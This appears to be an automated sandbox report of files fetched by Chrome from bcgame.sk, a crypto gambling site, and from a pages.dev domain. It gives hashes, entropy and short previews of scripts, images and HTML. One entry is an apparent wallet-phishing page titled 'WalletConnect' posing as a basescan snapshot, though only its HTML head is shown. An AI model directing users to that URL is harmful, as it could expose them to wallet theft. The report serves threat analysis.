                                                                                                                                                                                                                                              SSDEEP:48:AWXBW3XoiW4oyWnoSWdoLWqoMWXo7EW7oIfW1o/WQoMWuNouW6o6WloaW/o2OWFi:AWOXtaYCkkjY25jwqLRuXC8gm/sQesH9
                                                                                                                                                                                                                                              MD5:9C7923D1E6280948B7B38873D30965DF
                                                                                                                                                                                                                                              SHA1:794EC5097A68563CDD5DAFF6211626A5A1C18F4A
                                                                                                                                                                                                                                              SHA-256:D6BCBC36BC2C7CC44D50568C240411BCA3A8373851AA1F4A45211160B7F0797C
                                                                                                                                                                                                                                              SHA-512:A59D932BFDAE208ACF77F914BBB3E36E8AE7343B05532A8232B44B3927DC9F0CC4D65BDEE0A254811E90CF6B8B3F5A65BD90AE6B6967EC9393455FB12D770E95
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/i18n-e6eba74a.js
                                                                                                                                                                                                                                              Preview:import{J as t,_}from"./manifest-aca455c4.js";const{t:i,Trans:n}=t(Object.assign({"../../locales/ar-SA/index.json":()=>_(()=>import("./index-86ba13de.js"),[]).then(e=>e.default),"../../locales/bn-BD/index.json":()=>_(()=>import("./index-d533ed67.js"),[]).then(e=>e.default),"../../locales/de-DE/index.json":()=>_(()=>import("./index-5466eb7c.js"),[]).then(e=>e.default),"../../locales/en-IN/index.json":()=>_(()=>import("./index-56d569f3.js"),[]).then(e=>e.default),"../../locales/en-US/index.json":()=>_(()=>import("./index-a08e073c.js"),[]).then(e=>e.default),"../../locales/es-ES/index.json":()=>_(()=>import("./index-32e9c3fe.js"),[]).then(e=>e.default),"../../locales/fa-IR/index.json":()=>_(()=>import("./index-d02e5bf0.js"),[]).then(e=>e.default),"../../locales/fi-FI/index.json":()=>_(()=>import("./index-c3f3a06d.js"),[]).then(e=>e.default),"../../locales/fil-PH/index.json":()=>_(()=>import("./index-47fd745b.js"),[]).then(e=>e.default),"../../locales/fr-FR/index.json":()=>_(()=>import("./i
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1451)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1452
                                                                                                                                                                                                                                              Entropy (8bit):5.246608575210582
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:uiIGrFJ1zZF/3d1ulHFxkpcdFqnDkp8NFeDkpFFukZnG:u6H19F/3diFxkWdF8kcFOkbFukZnG
                                                                                                                                                                                                                                              MD5:069C20C840DEFE3A9D1B036DDCAB667C
                                                                                                                                                                                                                                              SHA1:C3E0B336F38ECDF126D66F7AA3E20E98A290F8D9
                                                                                                                                                                                                                                              SHA-256:96030013A01186E4FFC9AA55CCF805BE1AB851E34E62A370804A499B078DFE56
                                                                                                                                                                                                                                              SHA-512:B6ABF5F1FEECEA986207F00C392DD4832705BDA8495AE58A3081532EA5E637A159997D703F78DB97FD19F6479252D08C997906A55C28126C1C2832AA210C77CC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/CountryAvatar-04e11269.js
                                                                                                                                                                                                                                              Preview:import{h as l,k as s,t as n}from"./solid-js-8ff414d5.js";import{c as i}from"./countries-18533370.js";import{b as a}from"./lottery-9c791aba.js";var p=n('<section class="relative min-w-[24px] min-h-[24px] w-[24px] h-[24px] overflow-hidden border border-solid border-third rounded-full"><img class="w-[24px] min-w-[24px] absolute"alt="">'),u=n('<section class="relative min-w-[16px] min-h-[16px] w-[16px] h-[16px] overflow-hidden"><img class="w-[16px] min-w-[16px] absolute"alt="">'),m=n('<section class="relative w-[64px] min-h-[64px] h-[64px] overflow-hidden"><img class="w-[64px] absolute"alt="">'),c=n('<section class="relative min-w-[48px] min-h-[48px] w-[48px] h-[48px] overflow-hidden"><img class="w-[48px] min-w-[48px] absolute"alt="">');function d(o){return(()=>{var r=p(),t=r.firstChild;return l(t,"src",i),s(e=>(e=a(o.country,1))!=null?t.style.setProperty("top",e):t.style.removeProperty("top")),r})()}function f(o){return(()=>{var r=u(),t=r.firstChild;return l(t,"src",i),s(e=>(e=a(o.country
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2071)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2072
                                                                                                                                                                                                                                              Entropy (8bit):5.361689504586738
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:maT0T4zJV8EZBocqvVUOO//Uk1nbT2U/nz:mix8ckUOO//h1nXl/z
                                                                                                                                                                                                                                              MD5:4BD0DB3556274F3004111BD8D57BAB46
                                                                                                                                                                                                                                              SHA1:78AC6BF04636B3BC469C1C48931CBEA8379EA561
                                                                                                                                                                                                                                              SHA-256:30E0DA5A34EEDAC051F1401DF538E6AB66B9B2C78F82A2F8771EA6B396C9F619
                                                                                                                                                                                                                                              SHA-512:2B70EE2F96AD9105C15EDD5F26CE7856FE9FF3F9F9A717361AC386337DA13246BB2CE797D99472446BA1A22BD5FAE483D597B13432305FD14DDD08FB19082EA0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{c as s,i as l,e as y,s as c,t as u}from"./web-13cf6287.js";import{g as _}from"./manifest-51a3674f.js";import{C as o}from"./currency-format-1c532f37.js";import{T as $}from"./table-f81aed47.js";import{t as r}from"./i18n-fcfac1d2.js";import{s as p}from"./index-96ed660e.js";import{s as b}from"./index-76d972f3.js";import"./solid-js-38561dfe.js";import"./_baseGetTag-c2e287b9.js";import"./isArray-79a0be9c.js";import"./http-f4555b94.js";import"./baseService-449c2e3e.js";import"./_baseFor-3fee30d6.js";import"./_MapCache-1fb5cc44.js";var C=u('<span class="w-24 overflow-hidden text-ellipsis font-extrabold">'),h=u("<span class=uppercase>"),L=u('<span class="font-semibold text-brand">'),w=u('<div class="flex flex-col items-center justify-center pt-3"><img class=h-12><div class="flex gap-x-1"><img class=size-5><span class="font-extrabold text-primary"></span><img class=size-5>');const E=()=>s(_,{get children(){return s(I,{})}}),I=()=>{const[g]=b.spinFeedResource(),x=()=>[{title:r("User Name")
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):15403
                                                                                                                                                                                                                                              Entropy (8bit):4.69349138634662
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:h47ioZU39vI/sTdQhTpuXXuZMm9dt4JoTVWXjViAGQOniZvkmFuB87BUygxbiA5y:hQVZqZTmTHj9MzUZQNkwWztM
                                                                                                                                                                                                                                              MD5:C8A9BD63967C415F331695AE6A2D65AC
                                                                                                                                                                                                                                              SHA1:07C58C3715B2F0CC86464CF2A5D24ACD1CD0AE73
                                                                                                                                                                                                                                              SHA-256:0D99F9E8F8AD9FEDB2F592FFCE1B8593AD8E6FE1DFA5A0CEEAD346A95F33E5B0
                                                                                                                                                                                                                                              SHA-512:8A77F3B94B01096AC1738C59B6F20273B1306E3E62972EABE4822474FCBAD3B93EB57E430D63775163884844CFB1BC911E0FBCC57DE4F686E66A2E96417970BD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/bg-BlZBL8HD.svg
                                                                                                                                                                                                                                              Preview:<svg width="1200" height="260" viewBox="0 0 1200 260" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_13_69505)">.<mask id="mask0_13_69505" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="9" y="0" width="1201" height="260">.<rect x="9.03906" width="1200" height="260" rx="12" fill="url(#paint0_linear_13_69505)"/>.</mask>.<g mask="url(#mask0_13_69505)">.<path d="M29.4651 52.0026L58.2955 103.99H0.634766L29.4651 52.0026Z" fill="#2F3435"/>.<path d="M87.469 156.009L116.299 207.996H58.6387L87.469 156.009Z" fill="#2F3435"/>.<path d="M58.1775 103.99L29.3471 52.0025L87.0079 52.0025L58.1775 103.99Z" fill="#2B3031"/>.<path d="M1.1736 207.996L-27.6568 156.009L30.004 156.009L1.1736 207.996Z" fill="#2B3031"/>.<path d="M116.181 207.996L87.3511 156.009L145.012 156.009L116.181 207.996Z" fill="#2B3031"/>.<path d="M29.4646 52.003L0.634255 0.0152309L58.295 0.0152359L29.4646 52.003Z" fill="#2B3031"/>.<path d="M87.0076 52.003L58.1772 0.0152309L115.838 0.0152359L87.0076 52.003Z"
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2897)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2898
                                                                                                                                                                                                                                              Entropy (8bit):5.130909834587299
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:LXi5WbIo9WFolWioJWCogWnonWPo+EWveopfWtomWYoLWQ3oJW4XolWTolWy3oxF:Lclyy+hZeI0F638XLa32T1W1+1yVjNBi
                                                                                                                                                                                                                                              MD5:EB80D4DC4E917572ED47BFCCBBC709F8
                                                                                                                                                                                                                                              SHA1:48ACDBCB106D4673FC5A4248E00EF58078AB9DB5
                                                                                                                                                                                                                                              SHA-256:B76B6B48845B550FFF9B0AF274CBEDEC20F128DEDE94FD05D0D3FF0281785310
                                                                                                                                                                                                                                              SHA-512:A864300ED40638647B423322BE04BF5D46E813283D300FADB319BB31CEA03F6EAA5072D0283360F1F92878EDF9ECC30E35CBA8BA7819B9C2F25DB9F0E3A13176
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/i18n-78ff9edb.js
                                                                                                                                                                                                                                              Preview:import{V as t,_}from"./manifest-e71017e8.js";const{t:i,Trans:n}=t(Object.assign({"../locales/ar-SA/index.json":()=>_(()=>import("./index-df8a1f18.js"),[]).then(e=>e.default),"../locales/bn-BD/index.json":()=>_(()=>import("./index-2b6adc51.js"),[]).then(e=>e.default),"../locales/de-DE/index.json":()=>_(()=>import("./index-39de8abe.js"),[]).then(e=>e.default),"../locales/en-IN/index.json":()=>_(()=>import("./index-001f2211.js"),[]).then(e=>e.default),"../locales/en-US/index.json":()=>_(()=>import("./index-b0d72fd9.js"),[]).then(e=>e.default),"../locales/es-ES/index.json":()=>_(()=>import("./index-e746d3c0.js"),[]).then(e=>e.default),"../locales/fa-IR/index.json":()=>_(()=>import("./index-5cb34648.js"),[]).then(e=>e.default),"../locales/fi-FI/index.json":()=>_(()=>import("./index-fbccaf4a.js"),[]).then(e=>e.default),"../locales/fil-PH/index.json":()=>_(()=>import("./index-a9126949.js"),[]).then(e=>e.default),"../locales/fr-FR/index.json":()=>_(()=>import("./index-4ae3f7de.js"),[]).then(e=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1581
                                                                                                                                                                                                                                              Entropy (8bit):7.697389609400151
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:gG9999999999999999999999999999999999nOTDH630KAYc0g/WCBF9JNapDw5N:S+3eYc0+FfkpDwxT7cKccg5BPfOsQY4
                                                                                                                                                                                                                                              MD5:DBCB9A88B1869BA57C0FAD6854094545
                                                                                                                                                                                                                                              SHA1:38189CEA845E14CB1455A5FDD9B1BB6506DC4EAC
                                                                                                                                                                                                                                              SHA-256:089302B5DF66BCE515C8AEAA3BF15D739F62459354EA3FC53D2D7BA694F456C2
                                                                                                                                                                                                                                              SHA-512:F4F32126DF006D5C7B3E5D64F4317554FEB85A04145751F2C600C42D89D1BE43ABCEF3A544DC202C5544EAB2624FFAD2FAC7C48241A4A0B4AC49C07D63B9D848
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..........................................................................................................................C..$.....v.......8....................{..J............q....=../..*...............W..Q..4.....k..f..]...........V.....%tRNS........-)..qD.......yh84mL&..v.!.N&i......IDATx....V"=...bGv..w....W..q..F..j...3.F..iz....:..T.2.<:....s.....w.$.K.t<.....1.....04b....'.....^........I..A|.2.Sx..x..0....yp...l%.X!.5...2.-.....@2._.... ..R.."..o..i....~\w.rD....3f.k.g.:.h.....[~B/+.rn.....E...*u1..0?.p..'.(..n[S8.~#'y......*l...%....H..p.I.V$......Hn.?4y..I.>.lA0`n..B.L.R.h+@.........D..<.Rm......;..W.,j#QN.f...;..z..H4...!..`.:..F.A..a(..N..6JQ..jr...E...M........o{pU.F.|.h.,...U...wo...2...-..].....WF7..}..>-..]....e..,W..K.1..R...9U...s?f.{a.........R3..=G.\...%--).H.1+.8..Q.{$J...9.....D..R..$e.Di..9...H0e.i>...H0a....m{..i..=.w..).).n..mX.v.6...)l..r..Nj..Q..e...2.Do.I..#.kAF.........:.i.TZ
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9598
                                                                                                                                                                                                                                              Entropy (8bit):7.971650780963332
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:mdg48n8c5grZiD86DA3mCVMULKWbNEEzzqGu5YTNISM3jMmH5qnWwcmuL:A7CaMDehnEE3qZ5YX4jM9PcDL
                                                                                                                                                                                                                                              MD5:0D0DE221672D3E5950F30127C8BA7C93
                                                                                                                                                                                                                                              SHA1:8077CB66D5F162EB2CB0F62F107196D942545058
                                                                                                                                                                                                                                              SHA-256:A7D510F354697121372AFB6AF3A55382B5BE13AE65AAD64B36CBB984CF015C66
                                                                                                                                                                                                                                              SHA-512:7B8F53BA6A0FB546E3FADDA04137DCA1A5AC92ED5776EB50423BD80A0055A979043471DD0158C013DA3662AFA834E0F806997D608F7DC8CA02484111C69DC386
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d........."..$....sRGB....... .IDATx^.]...:.D.k........k.G."....F..\..PHP..........L/l.q..XL.6.....GN.A".q.vyN....S..x..s..z..#..N......s.<.....;h.4n.%..x9......F..?`...p..<u...s.~...i'G.q%.=.....F...........H..B.x1..p....\`....;.X...t\.[-..w.....V-U...^..L..G.l.....t...x.|..(.`.........!..8!....._...r.....?.R.N.x2O.d.=.Y.H.E....;N2mX.g.6...$;..Ui.v..`uP.#.I+...t.%4. .v.5.2.. .O@.}[.q?gd"D...T."^.O9B.....D..W.K?.cf..gaV3.nS.8.....R+.....I..-`@.......@.l...8....y.+..Q.......8~.`kJ.....z...u.gCj....t+....(,....P.{........y..8..Y....j.......Y.0..|.L.2...W-c.....9....<7 ..h>....fl4..H...N.O....._....:.+.a.R..@..E.{.V../..Ma#. .R(...Y+l0.d....Sp]...0Q<.,C.H<7...K..O.J...j.n.`"u....._.V`m>W{(*.. Rw........,.....2.jz/{.S...D...b..3.3X..?..1.5...bWx..Q#...@...X..".>.}..~.........h4~}..W>l}..o...Z.5......m..G....V..E....2...V......7...pN^.......W.&.>.G#._.p.\'.HH.V.&.|...+.....luf9....&_4x.^].....nx.._ ..:....tf...T.L...)..Xf.......B?
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/generic-tokentxns2?m=normal&contractAddress=0x28a5e71bfc02723eac17e39c84c5190415c0de9f&a=&sid=b9ff423ad9544d672c2bdf1610649561&p=1
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1538)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2130
                                                                                                                                                                                                                                              Entropy (8bit):5.147735369181888
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:0EzuljHjb7SWo+F+i+a+TMNF+TMO5v5miewe5CHZ/VAKCqB7RxT3Tv:z4Hjb7SWoIddvTvmmAUC4qB7RxLTv
                                                                                                                                                                                                                                              MD5:1CCC5C7D284C0C925E266F79E24A5D84
                                                                                                                                                                                                                                              SHA1:1BF5E0A9E4E74E82AF29EDEB843D96082E1C69D2
                                                                                                                                                                                                                                              SHA-256:34994625F21CF6F8874A7CCCF4EB06385D3AE72AE80BE1C47250E6E978C7DEC4
                                                                                                                                                                                                                                              SHA-512:C0EE996FD0C4E687ABD5426BF294CB2FF500B3E7F08043DD10A02E7024E60D5D38381BC9AB3BC24CFE59AD9A084EBD66C180F101A38EC08BCA589EC9E9C8B17A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729n
                                                                                                                                                                                                                                              Preview:<!doctype html><html lang="en"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,user-scalable=no,initial-scale=1,viewport-fit=cover"/><meta name="theme-color" content="#000000"/><meta name="format-detection" content="telephone=no,email=no"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><link rel="icon" href="/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"/><link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"/><link rel="manifest" href="/manifest.webmanifest"/><link rel="preload" href="/cache/game/support/system/conf/" as="fetch" crossorigin="anonymous"/><link rel="preload" href="/api/account/get/" as="fetch" crossorigin="anonymous"/><link rel="preload" href="/api/user/amount/" as="fetch" crossorigin="anonymous"/><link rel="preload" href="/assets/avertastd-mono-extrabold-BWo4zV1n.wof
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):38096
                                                                                                                                                                                                                                              Entropy (8bit):7.991849474569068
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:HzclcuS7dmF9ZBT1SVKAaqKNyF9Tn7BTxRm8Jr38T/OjZeyiwkeN:TEcuShmUcte7BTvSrsiwkA
                                                                                                                                                                                                                                              MD5:E4D3E1E585E352EF0DFE8039437D5601
                                                                                                                                                                                                                                              SHA1:0B68FF283D35B3E569E9F58EF7095CF06B3C5C63
                                                                                                                                                                                                                                              SHA-256:AF3A0640022C4AA0F696B6D0D20063BD15614B8A0C008AB934517F396DE3328B
                                                                                                                                                                                                                                              SHA-512:3ECD197EBE3B8A54EF69635FB9EA7397693E4860E203954EA68CADAFC0DAD94FD55A6A99B49C47E1E810804B9389BB6B6AEDCDC2B48BBC60F81D5B747C8AE94C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............1^g....sRGB....... .IDATx^.....u'.*t..3...].E ....I.`.HJ.. ..%Q....t....|>...O....).N..lJ...E....H.......6.I.]U..Uu..... %.>.[h..TW.tW...^.z.......|.u'z...i>..4......y`..$..k>.&i.X..5I...O.I...|zM.<...k..5.^.4......y`..$..k>.&i.X..5I...O.I...i...+4.f.y`.*I..-.;.R.S..O3.<.N.J.l\w....|r..>...T..X.......K.W..5wR`..l;..X.a..^Y...I.H'.....io.X.0..k.$...Kg..4O.s..O.O`a....@.J.{.17r.W..x:.k,.ev......M....H......,%.0....S.zm...mS.@.a..S(o^..]../.e..,..JHT.c~qR._k...%..ii..$$....K.*.k...u:....8..~..B[.~.BP).J4.^^q.7].Bw.s.^.....B..n..h4..&.g[b\..J/...5....#=i...kI* .......<b.R.i....8..C...%....{.>.J,E.W.?4.}.C..=ay...5w7.|.k.OJ....[_Z.h..}!..*75.<.V".+...v.o.5[..............|...n.|...WO.T..\p...\)..$3......+..M..TD*..~x...r^.....X...J.%..8g.....D...yk.D.F.....e..@m`.Tv..P...uw.n^4=V.%V...gW...~..!..ci#..L....6?.._..W.D.t...~...75>,'.\%....HCc.l...,..p[...$...io...k...K.OO...qN.M.ZxI.L6....\.{....X.`d.AJ...j..m.N.*
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):12997
                                                                                                                                                                                                                                              Entropy (8bit):7.826775166888353
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+0ZIoYNMtKw/vhOHSZ6+9W3TM+cdp1uSaJsyzvNNi9XLcXapx31F:XYNg7/vw4qMbJ/yDuYqpNz
                                                                                                                                                                                                                                              MD5:1FF609DB0CFF6238C315871462D2F932
                                                                                                                                                                                                                                              SHA1:4C3FA9DD3DEC8A45503C3607191B93FD21DF20EE
                                                                                                                                                                                                                                              SHA-256:8A896A0033773135605040AE43649A252FF41C1A7D23A9FA5996A54F4E8F7765
                                                                                                                                                                                                                                              SHA-512:7274131E61E815F00CBB86A06AB097C8F07F7C33C567829AFC9C48B2E1FE5E4FD246FCEBDCB5BE64FA1951E52913C1BCB2D3B60CF5E2185810A50497F53B72EE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/8a83305a67.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..%V...(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4246)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5253
                                                                                                                                                                                                                                              Entropy (8bit):5.076537494513766
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:UID+rHG5iCTZ1iLNB3KApPzRZvsYan94vnYnRufj/RTznRGiRvJ88GeO:Uy+jVCTZybfplNR1n8uLLGw68GeO
                                                                                                                                                                                                                                              MD5:8159A15CB8648BAED35579A71DF0DAFE
                                                                                                                                                                                                                                              SHA1:408DB772D779350F589698F96AFA5D529CB37854
                                                                                                                                                                                                                                              SHA-256:250B910ED0DA1540709E008B35CBBC88EB8BE7C935331C2CFBD1DB00A1215EA6
                                                                                                                                                                                                                                              SHA-512:16FE292716944518D2C4BF066F66493CE7C8A893AB6B7D265DC629A61978608B721468D6837898D2C7191B3DF7D46D374C677DB1AFF45346EB686B5E832E1D68
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:try{self["workbox:window:6.6.0"]&&_()}catch{}function S(t,o){return new Promise(function(e){var i=new MessageChannel;i.port1.onmessage=function(f){e(f.data)},t.postMessage(o,[i.port2])})}function W(t,o){for(var e=0;e<o.length;e++){var i=o[e];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function E(t,o){(o==null||o>t.length)&&(o=t.length);for(var e=0,i=new Array(o);e<o;e++)i[e]=t[e];return i}function k(t,o){var e;if(typeof Symbol>"u"||t[Symbol.iterator]==null){if(Array.isArray(t)||(e=function(f,d){if(f){if(typeof f=="string")return E(f,d);var h=Object.prototype.toString.call(f).slice(8,-1);return h==="Object"&&f.constructor&&(h=f.constructor.name),h==="Map"||h==="Set"?Array.from(f):h==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(h)?E(f,d):void 0}}(t))||o){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError(`Invalid attempt to iterate non-iterable inst
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
